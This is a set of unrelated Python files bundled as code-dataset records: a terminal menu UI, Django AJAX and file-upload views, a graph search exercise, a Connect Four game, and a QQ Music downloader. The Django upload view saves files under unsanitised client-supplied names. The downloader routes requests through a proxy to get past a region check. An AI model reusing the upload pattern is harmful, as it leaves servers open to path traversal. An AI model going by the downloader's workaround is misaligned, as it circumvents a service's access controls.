for m in self.menu:\n if m[2] is not None:\n m[2].set_parent(self)\n m[2].set_main_wnd(self.main_wnd)\n self.__make_menu_item(m)\n\n\n def set_base_corner(self, x=0, y=0):\n if self.position == \"top\":\n self.menu_x = x\n self.menu_y = y\n elif self.position == \"bottom\":\n self.menu_x = x\n self.menu_y = self.term.__height - 1\n\n def set_parent(self, parent=None):\n self.parent = parent\n\n # def add_main_menu(self, menu):...\n\n def on_resize(self, sig, action):\n self.render()\n\n def on_paint(self):\n self.screen.begin()\n self.render()\n self.screen.end()\n\n def on_focus(self, focus: bool = False):\n self.focus_owner = focus\n if not focus:\n self.sub_menu_focus = False\n if self.sub is not None:\n self.sub.on_focus(False)\n self.sub.on_paint()\n\n def render(self):\n height, width = self.term.height, self.term.width\n scr_back_clr = getattr(self.term, 'on_' + self.background_clr)\n text_clr = getattr(self.term, self.text_clr)\n disabled_clr = getattr(self.term, self.disabled_pos_clr)\n\n # with self.term.location(self.menu_x, self.menu_y):\n # for ii in range(self.menu_x, width - self.menu_x, 1):\n # echo(f'{scr_back_clr} ')\n\n for ii in range(width - self.menu_x - 1):\n self.screen.echo(self.screen_id, self.menu_x + ii, self.menu_y, f'{scr_back_clr} {self.term.normal}{scr_back_clr}')\n\n # echo(self.term.normal)\n\n if self.menu is not None:\n echo(self.term.move(self.menu_y, self.menu_x))\n offset = self.left_gap\n for (idx, m) in enumerate(self.menu):\n title = m[0]\n if idx == self.selection and self.focus_owner:\n clr = getattr(self.term, self.cursor_back_clr)\n else:\n clr = scr_back_clr + text_clr\n\n if not self._sub(idx).enable:#m[1]:\n clr = disabled_clr + text_clr\n self.screen.echo(self.screen_id, self.menu_x + offset, self.menu_y, f'{clr}{title}{self.term.normal}{scr_back_clr}')\n\n offset += len(title) + self.gap\n\n if self.sub is not None and self.sub_menu_focus:\n self.sub.on_paint()\n\n def _sub(self, sel=-1):\n if sel == -1:\n sel = self.selection\n sel_name:str = self.menu[sel][0]\n sel_name = sel_name.replace(' ', '_')\n attr = getattr(self, sel_name)\n return attr\n\n def run_selection(self):\n sel = self._sub()\n if sel.function is not None:\n sel.function()\n\n def sub_menu_base_corner(self):\n offset = 0\n for ii in range(self.selection):\n offset += len(self.menu[ii][0]) + self.gap\n self.sub.set_base_corner(self.menu_x + 2 + offset, self.menu_y + 1)\n\n def child_lose_focus(self):\n self.on_focus(True)\n if self.sub is not None:\n self.sub.on_focus(False)\n self.sub.on_paint()\n self.sub_menu_focus = False\n self.main_wnd.on_paint()\n self.parent.on_paint()\n\n\n def __remove_sub_focus(self):\n self.on_focus(True)\n self.sub_menu_focus = False\n self.parent.on_paint()\n if self.sub is not None:\n self.sub.on_focus(False)\n\n def _next_select(self):\n self.selection += 1\n # self.selection = self.selection % len(self.menu)\n while not self._sub(self.selection % len(self.menu)).enable:\n self.selection += 1\n # self.selection = self.selection % len(self.menu)\n\n def _prev_select(self):\n self.selection -= 1\n # self.selection = self.selection % len(self.menu)\n while not self._sub(self.selection % len(self.menu)).enable:\n self.selection -= 1\n # self.selection = self.selection % len(self.menu)\n # self.selection -= 1\n\n def run(self, key=None):\n self.on_paint()\n sub = self._sub()\n self.sub = sub.sub_menu\n if key is not None:\n if self.focus_owner and not self.sub_menu_focus:\n if key.name in self.next_select:\n self._next_select()\n # self.selection += 1\n elif key.name == self.prev_select:\n self._prev_select()\n # self.selection -= 1\n elif key.name in self.escape:\n self.parent.child_lose_focus()\n\n if not self.sub_menu_focus:\n if key.name == 'KEY_ENTER':\n if self.sub is not None:\n self.sub_menu_focus = True\n self.sub.set_main_wnd(self.main_wnd)\n self.sub_menu_base_corner()\n self.sub.on_focus(True)\n self.sub.run()\n return None\n else:\n self.run_selection()\n return None\n else:\n if self.sub is not None:\n key = self.sub.run(key)\n # return None\n self.selection = self.selection % len(self.menu)\n self.on_paint()\n return key\n\n\n#############################################################################\n\nclass SubMenu(MainMenu):\n\n # menu = None\n # cnt = 4\n\n def __init__(self, name=\"\"):\n super().__init__(name)\n # self.term = Terminal()\n\n self.screen_id = self.screen.bind()\n\n self.wnd_border = False # True\n self.background_clr = \"magenta\"\n self.cursor_back_clr = \"bold_red_reverse\"\n self.text_clr = \"white\"\n\n self.position = \"top\"\n\n self.selection = 0\n self.left_top_corner = \"\\u250c\"\n self.right_top_corner = \"\\u2510\"\n self.left_bottom_corner = \"\\u2514\"\n self.right_bottom_corner = \"\\u2518\"\n self.hor_line = \"\\u2500\"\n self.vert_line = \"\\u2502\"\n\n self.next_select = [\"KEY_TAB\", \"KEY_DOWN\"]\n self.prev_select = \"KEY_UP\"\n self.escape = [\"KEY_ESCAPE\", \"KEY_LEFT\"]\n\n self.focus_owner = False\n self.sub_menu_focus = False\n self.parent = None\n self.sub = None\n\n self.wnd_border = True\n\n self.menu_x = 1\n self.menu_y = 1\n self.__get_menu_size()\n\n def __get_menu_size(self):\n\n if self.menu is None:\n return\n\n self.m_height = len(self.menu) - 1\n self.m_max_len = 0\n for m in self.menu:\n self.m_max_len = len(m[0]) if self.m_max_len < len(m[0]) else self.m_max_len\n\n self.m_width = self.m_max_len\n\n if self.wnd_border:\n self.m_width += 2\n self.m_height += 2\n self.gap_x = self.menu_x + 1\n self.gap_y = self.menu_y + 1\n self.width = self.m_width - 2\n self.height = self.m_height - 2\n else:\n self.gap_x = self.menu_x\n self.gap_y = self.menu_y\n self.width = self.m_width\n self.height = self.m_height\n\n def is_menu(self) -> bool:\n return True\n\n def sub_menu_base_corner(self):\n if self.sub.is_menu():\n self.sub.set_base_corner(self.menu_x + self.m_width + 1, self.menu_y + self.selection + 1)\n\n def set_base_corner(self, x=0, y=0):\n self.menu_x = x\n self.menu_y = y\n self.__get_menu_size()\n\n def set_parent(self, parent=None):\n self.parent = parent\n\n def on_resize(self, sig, action):\n self.on_paint()\n\n # cnt = 0\n def on_paint(self):\n self.screen.begin()\n self.render()\n self.screen.end()\n\n def render(self):\n\n if not self.focus_owner:\n self.screen.disable_region(self.screen_id)\n return\n\n # height, width = self.term.height, self.term.width\n scr_back_clr = getattr(self.term, 'on_' + self.background_clr)\n text_clr = getattr(self.term, self.text_clr)\n disabled_clr = getattr(self.term, self.disabled_pos_clr)\n\n if self.wnd_border:\n # top corners\n self.screen.echo(self.screen_id, self.menu_x, self.menu_y,\n f'{scr_back_clr}{self.left_top_corner}{self.term.normal}{scr_back_clr}')\n\n self.screen.echo(self.screen_id, self.menu_x + self.m_width, self.menu_y,\n f'{scr_back_clr}{self.right_top_corner}{self.term.normal}{scr_back_clr}')\n\n # bottom corners\n self.screen.echo(self.screen_id, self.menu_x, self.menu_y + self.m_height,\n f'{scr_back_clr}{self.left_bottom_corner}{self.term.normal}{scr_back_clr}')\n\n self.screen.echo(self.screen_id, self.menu_x + self.m_width, self.menu_y + self.m_height,\n f'{scr_back_clr}{self.right_bottom_corner}{self.term.normal}{scr_back_clr}')\n\n # lines\n # horizontal lines\n for ii in range(0, self.m_width - 1, 1):\n self.screen.echo(self.screen_id, ii + self.menu_x + 1, self.menu_y,\n f'{scr_back_clr}{self.hor_line}{self.term.normal}{scr_back_clr}')\n\n # with self.term.location(ii + self.menu_x + 1, self.menu_y + self.m_height):\n self.screen.echo(self.screen_id, ii + self.menu_x + 1, self.menu_y + self.m_height,\n f'{scr_back_clr}{self.hor_line}{self.term.normal}{scr_back_clr}')\n\n # vertical lines\n for ii in range(self.m_height - 1):\n self.screen.echo(self.screen_id, self.menu_x, self.menu_y + ii + 1,\n f'{scr_back_clr}{self.vert_line}{self.term.normal}{scr_back_clr}')\n\n self.screen.echo(self.screen_id, self.menu_x + self.m_width, self.menu_y + ii + 1,\n f'{scr_back_clr}{self.vert_line}{self.term.normal}{scr_back_clr}')\n\n w = self.m_max_len + 1\n\n for (idx, m) in enumerate(self.menu):\n title = m[0]\n if idx == self.selection:\n clr = getattr(self.term, self.cursor_back_clr)\n else:\n clr = scr_back_clr + text_clr\n\n if not self._sub(idx).enable:#m[1]:\n clr = disabled_clr + text_clr\n\n self.screen.echo(self.screen_id, self.gap_x, self.gap_y + idx, f'{clr}{title:{w}}{self.term.normal}{scr_back_clr}')\n\n if self.sub is not None and self.sub_menu_focus:\n self.sub.on_paint()","sub_path":"simpleinterface/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":12443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"167288926","text":"from django.shortcuts import render, HttpResponse\nimport json, os\n\n\ndef ajax(request):\n return render(request, 'ajax.html', locals())\n\n\ndef receive(request):\n print(request.GET)\n print(request.POST)\n print(request.body)\n ret = {'status': True, 'message': 'Okkkkk'}\n\n return HttpResponse(json.dumps(ret))\n\n\ndef files_receive(request):\n print(request.GET)\n print(request.POST)\n print(request.FILES)\n ret = {'status': True, 'message': 'Okkkkk'}\n import json\n return HttpResponse(json.dumps(ret))\n\n\ndef iframe_example(request):\n return render(request, 'iframe_example.html')\n\n\ndef receive_example(request):\n print(request.FILES)\n\n ret = {'status': True, \"data\": None, 'message': None}\n obj = request.FILES.get('img')\n\n file_path = os.path.join('static', obj.name)\n f = open(file_path, 'wb')\n for line in obj.chunks():\n f.write(line)\n f.close()\n\n ret['data'] = file_path\n return HttpResponse(json.dumps(ret))\n","sub_path":"SelfLearn/框架(Django)/181014_ajax詳解/mysite/app01/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"285010693","text":"import sys\n\n#sys.stdin = open(\"input.txt\", \"r\")\ndef dfs(v):\n global result\n visited[v] = 1\n for r in route:\n if r[v] != 0 and visited[r[v]] ==0 :\n if r[v] == end:\n result = 1\n dfs(r[v])\n\n\n\nfor test_case in range(1, int(input()) + 1):\n V, E = map(int, input().split())\n route = [[0] * (V+1) for _ in range(V+1)]\n for e in range(E):\n a, b = map(int, input().split())\n for p in route:\n if p[a] == 0:\n p[a] = b\n break\n start, end = map(int, input().split())\n result = 0\n visited = [0] * 100\n dfs(start)\n print('#{} {}'.format(test_case, result))\n\n","sub_path":"8월/swea_4871.py","file_name":"swea_4871.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"168946904","text":"from board import *\nfrom communicator import *\nfrom sys import argv\nfrom GUI import GUI\nfrom ai import AI\n\n\nclass Game:\n \"\"\"\n Game class, handles gameplay, gui and communicator\n \"\"\"\n PLAYER_ONE = 0\n PLAYER_TWO = 1\n DRAW = 2\n EMPTY = 3\n MIN_PORT_VALUE = 1000\n MAX_PORT_VALUE = 65535\n\n WINNING_SEQ_LENGTH = 4\n\n ILLEGAL_MOVE = \"Illegal move\"\n INVALID_MESSAGE = \"Invalid message received\"\n INVALID_GAME_STATE = \"Invalid game state\"\n CHECK_WINNER_FLAG_INDEX = 29\n ADD_CHIP_FAILED = \"Failed to add chip to specified column\"\n COMMUNICATOR_MESSAGE_1 = \"CHIP_DATA: \"\n COMMUNICATOR_MESSAGE_2 = \"CHECK_WINNER: \"\n\n EXPECTED_AMOUNT_OF_ARGUMENTS_FOR_CLIENT = 4\n EXPECTED_LENGTH_OF_MESSAGE = 30\n\n def __init__(self):\n \"\"\" Initializes the game class \"\"\"\n # If server mode is on (no IP address provided)\n if len(argv) == 3:\n self.__player = self.PLAYER_ONE\n self.__enemy_player = self.PLAYER_TWO\n self.__current_player = self.__player\n else:\n self.__player = self.PLAYER_TWO\n self.__enemy_player = self.PLAYER_ONE\n self.__current_player = self.__enemy_player\n\n # Create board\n self.__board = Board(self.get_current_player)\n self.__game_over = False\n\n # initializes AI if AI was chosen at run\n self.__ai_flag = False\n if argv[1] == \"ai\":\n self.__ai = AI()\n self.__ai_flag = True\n\n # Create gui\n self.__gui = GUI(self.__player, self.__make_move,\n self.get_current_player, self.__ai_flag)\n\n # If this is the client, disable buttons until player turn\n if self.__player == self.PLAYER_TWO:\n self.__gui.disable_column_buttons()\n\n # TODO:: Ugly code, find a workaround\n self.__last_inserted_chip = None\n\n # Parse data for communicator\n port = int(argv[2])\n ip = None\n\n if len(argv) == self.EXPECTED_AMOUNT_OF_ARGUMENTS_FOR_CLIENT:\n ip = argv[3]\n\n # Initializes communicator\n self.__communicator = Communicator(self.__gui.get_root(), port, ip)\n self.__communicator.connect()\n self.__communicator.bind_action_to_message(\n self.parse_rival_message)\n\n # If AI on server start the game, make a move\n if self.__ai_flag and self.__player == self.PLAYER_ONE:\n self.__ai.find_legal_move(self, self.__make_move)\n\n # Start the gui and game\n self.__gui.get_root().mainloop()\n\n def __make_move(self, column):\n \"\"\" :param column: Column in whivh to place chip \"\"\"\n\n # if game over flag on, returns\n if self.__game_over:\n return\n\n # attempts to place chip in column\n success, row = self.__board.check_legal_move_get_row(\n column, self.PLAYER_ONE if not self.__current_player\n else self.PLAYER_TWO)\n if not success:\n raise Exception(self.ILLEGAL_MOVE)\n\n # Store move for other functions\n self.__last_inserted_chip = column, row\n\n # Relay move to enemy\n self.__communicator.send_message(self.COMMUNICATOR_MESSAGE_1\n + str(column) + \",\" + str(row)\n + \" \" + self.COMMUNICATOR_MESSAGE_2\n + \"1\" if not self.__game_over else\n \"0\")\n\n self.__check_winner(column, row)\n\n def __check_winner(self, column, row):\n \"\"\" :param column: Column of newest chip\n :param row: Row of newest chip \"\"\"\n # Get data if a winning state was reached\n winner, winning_chips = self.__board.find_connected_and_winner(column,\n row)\n\n # Get pixel location for newest chip\n x, y = self.__board.get_chip_location(column, row)\n if winner is None: # If game is still ongoing\n # Create the chip on board\n self.__gui.create_chip_on_board(x, y, self.__current_player,\n board=self.__board)\n\n # Toggle __player in class members\n self.__toggle_player()\n\n # Disable full columns\n self.__gui.disable_illegal_columns(self.__board)\n\n else: # Game ended\n self.__game_over = True\n if winner == self.DRAW:\n self.__gui.create_chip_on_board(x, y, self.__current_player,\n board=self.__board)\n self.__gui.disable_column_buttons()\n self.__gui.show_game_over_label(self.DRAW)\n else:\n self.__gui.create_chip_on_board(x, y, self.__current_player,\n winning_chips=winning_chips,\n board=self.__board,\n winner=winner)\n\n def __toggle_player(self):\n \"\"\" Toggles members in the class, also make gui show switching of\n turns \"\"\"\n self.__current_player = self.PLAYER_TWO \\\n if self.__current_player == self.PLAYER_ONE \\\n else self.PLAYER_ONE\n\n flag = self.__current_player == self.__player\n\n self.__gui.end_turn_switch_player(flag)\n\n def get_winner(self):\n \"\"\" Gets the winner if there is one.\n This function is not used by the game \"\"\"\n return self.__board.find_connected_and_winner(\n self.__last_inserted_chip[0], self.__last_inserted_chip[1])[0]\n\n def get_player_at(self, row, col):\n \"\"\" :param row: Row to check\n :param col: Column to check\n :return: Player at place\n \"\"\"\n player = int(self.__board.get_columns()[col][row])\n return None if player == self.EMPTY else player\n\n def get_current_player(self):\n \"\"\" Getter for current __player \"\"\"\n return self.__current_player\n\n def get_board(self):\n \"\"\" Getter for board \"\"\"\n return self.__board\n\n def parse_rival_message(self, message):\n \"\"\" :param message: Message received from enemy \"\"\"\n # Check message of corect length\n if len(message) != self.EXPECTED_LENGTH_OF_MESSAGE:\n raise Exception(self.INVALID_MESSAGE)\n\n # Parse data from message\n column = int(message[11])\n expected_row = int(message[13])\n\n # Update board and check if same row was returned\n success, row = self.__board.check_legal_move_get_row(\n column, self.PLAYER_ONE if not self.__current_player\n else self.PLAYER_TWO)\n\n # Assert it\n assert row == expected_row\n\n if success:\n # Update member\n self.__last_inserted_chip = column, row\n check_winner_flag = message[self.CHECK_WINNER_FLAG_INDEX]\n if check_winner_flag:\n self.__check_winner(column, row)\n\n else:\n raise Exception(self.ADD_CHIP_FAILED)\n\n self.__gui.disable_illegal_columns(self.__board)\n\n # If the AI is playing, make another move\n if self.__ai_flag and not self.__game_over:\n self.__ai.find_legal_move(self, self.__make_move)\n\n def get_last_inserted_chip(self):\n \"\"\" Getter for last inserted chip \"\"\"\n return self.__last_inserted_chip\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":7463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"264990029","text":"'''\nCreated on 2011-11-7\n\n@author: liuxue\n'''\nfrom django.conf.urls.defaults import patterns, url\n\nurlpatterns = patterns('apis.accounts.views',\n url(r'^login/$', 'accountLogin', name = 'accountLogin'),\n url(r'^regist/$', 'accountRegist', name = 'accountRegist'),\n url(r'^logout/$', 'accountLogout', name = 'accountLogout'),\n)\n","sub_path":"partyAssistant-backend/PartyAssistant/apis/accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"133568899","text":"import pandas as pd\nimport numpy as np\nfrom PIL import Image\nfrom matplotlib import image\nfrom import_from_S3 import get_dates\nfrom import_from_local import get_mask, get_wavelength, get_image, get_mask_partition\nimport statistics\nimport os\nimport sys\nimport numpy.ma as ma\n\nsys.setrecursionlimit(10**6)\n\n\n# Code the colour bands\nBLUE = 'B02'\nGREEN = 'B03'\nRED = 'B04'\nNIR = 'B08'\n\n# Create a dictionary for the VI's\nVI_dict = {}\n\n\n# SAVI calculation\ndef calculate_SAVI(NIR, RED, L):\n return (NIR - RED) / (NIR + RED + L) * (1+L)\n\n# NDVI calculation\ndef calculate_NDVI(NIR, RED):\n return (NIR - RED) / (NIR + RED) \n\n# ENDVI calcuation\ndef calculate_ENDVI(NIR, GREEN, BLUE):\n return ((NIR+GREEN) - (2*BLUE)) / ((NIR+GREEN) + (2*BLUE)) \n\n# GNDVI calcuation\ndef calculcate_GNDVI(NIR, GREEN):\n return (NIR - GREEN) / (NIR + GREEN)\n\ndef split_mask(X,Y):\n # print(os.getcwd())\n mask = get_mask(X, Y)\n split_mask = []\n for i in range(0,512):\n row = []\n for j in range(0,512):\n row.append(-1)\n split_mask.append(row)\n\n count = 1\n for i in range(0,512):\n for j in range(0,512):\n if (split_mask[i][j]==-1):\n if(mask[i,j,3]==255):\n bfs(i,j,i,j,mask, split_mask, count, 0)\n count+=1\n else:\n split_mask[i][j] = 0\n total = 0\n number = 1\n\n for x in range(1,count):\n mask = get_mask(X, Y)\n arr = np.array(split_mask)\n total = 0\n for i in range(0,512):\n for j in range(0,512):\n if split_mask[i][j] !=x:\n mask[i,j,3] = 0\n else:\n total +=1\n if (total > 100):\n data = mask.astype(np.uint8)\n img = Image.fromarray(data, 'RGBA') \n filename = f'../data/partition-mask/mask-x{X}-y{Y}-{number}.png'\n number+=1\n path = os.path.join(os.getcwd(), filename)\n print(path)\n img.save(path)\n\n\n\n\ndef bfs(i,j, i_prev, j_prev, mask, split_mask, idx, dept):\n if i>=0 and i <=511 and j>=0 and j<=511:\n if mask[i,j,3] == 255 and split_mask[i][j]==-1:\n split_mask[i][j] = idx\n i1 = i-1\n i2 = i+1\n j1 = j-1\n j2 = j+1\n temp = dept + 1\n if (temp < 45000):\n if i2<512 and (i2 != i_prev or j != j_prev) and mask[i2,j,3] == 255 and split_mask[i2][j]==-1:\n temp = temp+1\n bfs(i2,j, i,j, mask, split_mask, idx, temp)\n if j1>=0 and (i != i or j1 != j_prev) and mask[i,j1,3] == 255 and split_mask[i][j1]==-1:\n temp = temp+1\n bfs(i,j1, i,j, mask, split_mask, idx, temp)\n if i1>=0 and (i1 != i_prev or j != j_prev) and mask[i1,j,3] == 255 and split_mask[i1][j]==-1:\n temp = temp+1\n bfs(i1,j, i,j, mask, split_mask, idx, temp)\n if j2<512 and (i != i or j2 != j_prev) and mask[i,j2,3] == 255 and split_mask[i][j2]==-1:\n temp = temp+1\n bfs(i,j2, i,j, mask, split_mask, idx, temp)\n\n\n# UNCOMMENT THIS TO GENERATE PARTITION MASK\n# split_mask('7680', '10240')\n\ndef generate_VI_timeseries_DF(X,Y, path):\n dates = get_dates()\n\n for j in range(1,23):\n result = {}\n\n result['date'] = []\n\n result[BLUE] = []\n result[GREEN] = []\n result[RED] = []\n result[NIR] = []\n result['NDVI'] = []\n result['SAVI'] = []\n result['ENDVI'] = []\n result['GNDVI'] = []\n\n result['B02_UPPER'] = []\n result['B03_UPPER'] = []\n result['B04_UPPER'] = []\n result['B08_UPPER'] = []\n result['NDVI_UPPER'] = []\n result['SAVI_UPPER'] = []\n result['ENDVI_UPPER'] = []\n result['GNDVI_UPPER'] = []\n\n result['B02_LOWER'] = []\n result['B03_LOWER'] = []\n result['B04_LOWER'] = []\n result['B08_LOWER'] = []\n result['NDVI_LOWER'] = []\n result['SAVI_LOWER'] = []\n result['ENDVI_LOWER'] = []\n result['GNDVI_LOWER'] = []\n for date in dates:\n \n # BAND\n red = get_wavelength(X,Y,RED,date)\n blue = get_wavelength(X,Y,BLUE,date)\n green = get_wavelength(X,Y,GREEN,date)\n nir = get_wavelength(X,Y,NIR,date)\n\n # VI \n ndvi = calculate_NDVI(nir,red)\n endvi = calculate_ENDVI(nir, green, blue)\n gndvi = calculcate_GNDVI(nir, green)\n savi = calculate_SAVI(nir, red, 0.5)\n\n # MASK + IMG\n img = get_image(X,Y,date)\n mask = get_mask_partition(X,Y,str(j))\n\n # MASKING + FILTER\n mask1 = mask[:,:,3] != 255\n mask2 = np.logical_or(np.logical_or(img[:,:,0] >=200, img[:,:,1] >=200), img[:,:,2] >=200)\n mask3 = np.logical_or(mask1,mask2)\n \n # CALCULATE AVERAGE, STD\n\n red_res = ma.masked_array(red, mask=mask3)\n r_avg = red_res.mean()\n r_std = red_res.std()\n\n green_res = ma.masked_array(green, mask=mask3)\n g_avg = green_res.mean()\n g_std = green_res.std()\n\n blue_res = ma.masked_array(blue, mask=mask3)\n b_avg = blue_res.mean()\n b_std = blue_res.std()\n\n nir_res = ma.masked_array(nir, mask=mask3)\n n_avg = nir_res.mean()\n n_std = nir_res.std()\n\n if (r_avg is ma.masked or g_avg is ma.masked or b_avg is ma.masked or n_avg is ma.masked):\n continue\n if (r_std is ma.masked or g_std is ma.masked or b_std is ma.masked or n_std is ma.masked):\n continue\n\n ndvi_res = ma.masked_array(ndvi, mask=mask3)\n ndvi_avg = ndvi_res.mean()\n ndvi_std = ndvi_res.std()\n\n endvi_res = ma.masked_array(endvi, mask=mask3)\n endvi_avg = endvi_res.mean()\n endvi_std = endvi_res.std()\n\n gndvi_res = ma.masked_array(gndvi, mask=mask3)\n gndvi_avg = gndvi_res.mean()\n gndvi_std = gndvi_res.std()\n\n savi_res = ma.masked_array(savi, mask=mask3)\n savi_avg = savi_res.mean()\n savi_std = savi_res.std()\n\n # append result\n \n if (ndvi_avg is ma.masked or endvi_avg is ma.masked or gndvi_avg is ma.masked or savi_avg is ma.masked):\n continue\n if (ndvi_std is ma.masked or endvi_std is ma.masked or gndvi_std is ma.masked or savi_std is ma.masked):\n continue\n\n result[BLUE].append(b_avg)\n result['B02_LOWER'].append(b_avg-b_std)\n result['B02_UPPER'].append(b_avg+b_std)\n\n result[GREEN].append(g_avg)\n result['B03_LOWER'].append(g_avg-g_std)\n result['B03_UPPER'].append(g_avg+g_std)\n\n result[RED].append(r_avg)\n result['B04_LOWER'].append(r_avg-r_std)\n result['B04_UPPER'].append(r_avg+r_std)\n\n result[NIR].append(n_avg)\n result['B08_LOWER'].append(n_avg-n_std)\n result['B08_UPPER'].append(n_avg+n_std)\n\n result['NDVI'].append(ndvi_avg)\n result['NDVI_LOWER'].append(ndvi_avg-ndvi_std)\n result['NDVI_UPPER'].append(ndvi_avg+ndvi_std)\n\n result['ENDVI'].append(endvi_avg)\n result['ENDVI_LOWER'].append(endvi_avg-endvi_std)\n result['ENDVI_UPPER'].append(endvi_avg+endvi_std)\n\n result['GNDVI'].append(gndvi_avg)\n result['GNDVI_LOWER'].append(gndvi_avg-gndvi_std)\n result['GNDVI_UPPER'].append(gndvi_avg+gndvi_std)\n\n result['SAVI'].append(savi_avg)\n result['SAVI_LOWER'].append(savi_avg-savi_std)\n result['SAVI_UPPER'].append(savi_avg+savi_std)\n result['date'].append(date)\n\n df = pd.DataFrame(result)\n print(j)\n save_path = f'{path}result-{X}x-{Y}y-{j}'\n df.to_feather(save_path) \n\n\n\n\n\n\n\n\nX = '7680'\nY = '10240'\n\n# generate_VI_timeseries_DF(X,Y, 'temp/')\n\n# temp = pd.read_feather('temp/result-7680x-10240y-1')\n# print(temp.head(10)) \n\n# temp2 = pd.read_feather('temp/result-7680x-10240y-2')\n# print(temp2.head(10)) \n\n# temp2 = pd.read_feather('temp/result-7680x-10240y-3')\n# print(temp2.head(10)) \n# df = pd.DataFrame({'x':[1]})\n# j=1\n# path = 'result/'\n# save_path = f'{path}result-{X}x-{Y}y-{j}'\n# df.to_feather(save_path)\n# date = get_dates()[0]\n\n# red = get_wavelength(X,Y,RED,date)\n# img = get_image(X,Y,date)\n\n# # # print(red)\n\n# mx = ma.masked_array(np.array([1,2,3]), mask=[0, 0, 1])\n# print(mx)\n# print(type(mx[2]))\n# print(mx[2]=='--')\n# print(ma.masked)\n# if(mx[2] is ma.masked ):\n# print('asd')\n# else:\n# print('xxxx')\n\n# mask = get_mask(X, Y)\n\n\n# mask1 = mask[:,:,3] != 255\n\n\n# # temp2 = img[:,:] >= [200,200,200]\n# # print(temp)\n\n# mask2 = np.logical_or(np.logical_or(img[:,:,0] >=200, img[:,:,1] >=200), img[:,:,2] >=200)\n\n# mask = np.logical_or(mask1,mask2)\n\n# mx = ma.masked_array(red, mask=mask)\n# print(mx.mean())\n# print(mx.std())\n\n\n# # print(temp)\n\n# mx = ma.masked_array(red, mask=temp)\n# print(mx)\n\n\n# img = get_image(X,Y,'TCI',date)\n\n# (img[:,:,0] > 200 \n# print(temp)\n#get_VI_DF('7680', '10240','data/')","sub_path":"code_repository/create_VI_timeseries.py","file_name":"create_VI_timeseries.py","file_ext":"py","file_size_in_byte":9353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"105612857","text":"import time\r\nimport sys\r\nimport logging\r\nimport requests\r\nfrom pyquery import PyQuery\r\nfrom settings import *\r\n\r\n# reusable logging code snippet\r\nlogger = logging.getLogger(__name__)\r\nlogger.setLevel(logging.INFO)\r\nfmt = logging.Formatter('%(levelname)s: %(message)s')\r\nfh = logging.FileHandler('qqmusic.log', encoding='utf-8', mode='w')\r\nsh = logging.StreamHandler(sys.stdout)\r\nfh.setFormatter(fmt)\r\nsh.setFormatter(fmt)\r\nlogger.addHandler(fh)\r\nlogger.addHandler(sh)\r\n\r\n\r\nclass QQMusic:\r\n\r\n def __init__(self):\r\n\r\n # song specific params\r\n self.songmid = None\r\n self.title = None\r\n self.singer = None\r\n self.vkey = None\r\n\r\n def set_songmid(self, songmid):\r\n if len(songmid) == 14:\r\n self.songmid = songmid\r\n return True\r\n else:\r\n logger.error(\"invalid songmid\")\r\n return False\r\n\r\n def get_info(self):\r\n\r\n # get song's title and artist for naming purpose\r\n info_url = proto_info_url.format(self.songmid)\r\n info_res = requests.get(info_url)\r\n if info_res.status_code == 200:\r\n doc = PyQuery(info_res.text)\r\n self.title = doc('title').text().split('-')[0]\r\n self.singer = doc('title').text().split('-')[1].split(' - ')[0].strip()\r\n logger.info(\"song's title is \" + self.title)\r\n logger.info(\"song's singer is \" + self.singer)\r\n return True\r\n else:\r\n logger.error(\"unable to obtain song's info\")\r\n return False\r\n\r\n def get_vkey(self):\r\n\r\n # send HTTP request for vkey of specific song\r\n vkey_url = proto_vkey_url.format(self.songmid, self.songmid)\r\n\r\n # try several times until connection succeeds\r\n vkey_res = None\r\n for i in range(1, max_try):\r\n try:\r\n if enable_proxy == 'True':\r\n logger.info(\"connecting using proxies\")\r\n # ip check only happens here\r\n vkey_res = requests.get(vkey_url, proxies=mainland_proxy, timeout=10)\r\n else:\r\n logger.info(\"connecting\")\r\n vkey_res = requests.get(vkey_url)\r\n except IOError:\r\n continue\r\n logger.info(\"connected\")\r\n break\r\n\r\n if vkey_res is not None:\r\n try:\r\n # extract vkey from response\r\n pydict = vkey_res.json() # same as: pydict = json.loads(vkey_res.text)\r\n self.vkey = pydict['data']['items'][0]['vkey']\r\n logger.info(\"vkey is \" + self.vkey)\r\n return True\r\n except ValueError:\r\n logger.error(\"invalid songmid!\")\r\n else:\r\n logger.error(\"connection failed!\")\r\n return False\r\n\r\n def download_music(self):\r\n start = time.time()\r\n # begin downloading if vkey is not empty\r\n if self.vkey:\r\n download_url = proto_download_url.format(self.songmid, self.vkey)\r\n download_res = requests.get(url=download_url, stream=True)\r\n logger.info(\"status code: \" + str(download_res.status_code))\r\n if download_res.status_code == 200:\r\n with open(self.singer + ' - ' + self.title + '.mp3', 'wb') as f:\r\n for chunk in download_res.iter_content(1024):\r\n f.write(chunk)\r\n end = time.time()\r\n logger.info(\"download completed!\")\r\n logger.info(\"time taken: {0:6.4f} seconds\".format(end - start))\r\n else:\r\n logger.error('unable to download!')\r\n else:\r\n logger.error(\"no vkey found!\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n music = QQMusic()\r\n result = music.set_songmid(input())\r\n if result:\r\n result = music.get_info()\r\n if result:\r\n result = music.get_vkey()\r\n if result:\r\n music.download_music()\r\n","sub_path":"qqmusic.py","file_name":"qqmusic.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
